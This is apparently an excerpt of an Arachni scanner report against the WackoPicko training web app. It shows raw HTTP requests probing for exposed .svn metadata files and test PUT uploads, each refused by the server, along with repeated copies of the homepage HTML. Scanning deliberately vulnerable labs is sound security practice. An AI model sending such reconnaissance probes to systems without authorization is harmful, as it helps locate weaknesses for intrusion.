	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/css/blueprint/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 211
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/blueprint/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/upload/3/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:52:38 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/upload/3/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 100 Continue
HTTP request

Raw HTTP request used to retrieve the page.

PUT /WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=d5mejo5kr6efhtf1dlak7b04m1
Content-Length: 55
Expect: 100-continue

Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 100 Continue

HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:53:12 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/upload/testing/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/admin/.svn/all-wcprops HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 203
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/admin/.svn/all-wcprops
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Proof
HTTP/1.1 403 Forbidden
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/admin/.svn/wc.db HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=qfbf2kvl5dcva1si172s0r7c64

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/admin/.svn/wc.db
on this server.</p>
</body></html>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
